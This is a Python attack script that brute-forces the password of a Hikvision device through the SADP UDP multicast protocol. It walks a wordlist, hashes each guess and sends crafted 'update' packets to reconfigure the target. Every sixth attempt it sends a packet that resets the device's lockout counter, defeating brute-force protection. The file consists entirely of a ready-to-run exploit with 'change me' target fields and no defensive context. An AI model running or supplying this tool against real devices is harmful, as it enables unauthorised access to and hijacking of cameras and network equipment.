import socket import time import hashlib import base64 import re #UDP multicast address which Hikvision devices listen on UDP_IP = "239.255.255.250" UDP_PORT = 37020 MSG_SIZE = 4096 DEVICE_MAC = "AA-BB-CC-DD-EE-FF" #change me - THIS IS THE TARGET DEVICE #change me - update these params to match the target device configuration NEW_IPV4 = "192.0.0.64" NEW_IPV4_NM = "255.255.255.0" NEW_GATEWAY = "192.0.0.5" #change me - path to your dictionary file WORDLIST="/tmp/wordlist.txt" #reset lockout counter packet RESET = 'DAB7B40C-38AA-4CF0-AB6A-E52E6E52B3B6updatetrue'+DEVICE_MAC+''+NEW_IPV4+'8000'+NEW_IPV4_NM+''+NEW_GATEWAY+'::::0false80' sock = socket.socket(socket.AF_INET, # Internet socket.SOCK_DGRAM) # UDP sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 2) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sock.settimeout(3) wordfile = open(WORDLIST, 'r', encoding='utf-8') print("Starting!") #bruteforce attempts attempt_count = 0 while True: word = wordfile.readline().strip() if not word: break raw_md5 = hashlib.md5(word.encode('utf-8')) md5b64 = base64.b64encode(raw_md5.digest()).decode('ascii') brute = '44037D7F-7D48-4DB0-8893-05705C4AE965updatetrue'+DEVICE_MAC+''+md5b64+''+NEW_IPV4+'8000255.255.0.0'+NEW_GATEWAY+'::::0false80' if (attempt_count %1000 == 0 and attempt_count !=0): print(str(attempt_count)+"x requests sent - "+word) try: #send success reset if (attempt_count % 6 == 0): sock.sendto(RESET.encode(), (UDP_IP, UDP_PORT)) data = sock.recv(MSG_SIZE) sock.sendto(brute.encode(), (UDP_IP, UDP_PORT)) data = sock.recv(MSG_SIZE) if (re.search(r"success", data.decode())): print("[+] Success: "+word) print(data.decode()) break except: print("TIMEOUT") attempt_count += 1 print("DONE") sock.close()